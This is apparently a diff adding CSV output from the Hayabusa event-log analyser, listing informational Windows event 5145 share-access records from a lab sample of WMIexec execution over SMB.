+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Contacts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Downloads\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Favorites\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Links\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Music\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Pictures\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Saved Games\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Searches\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Videos\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
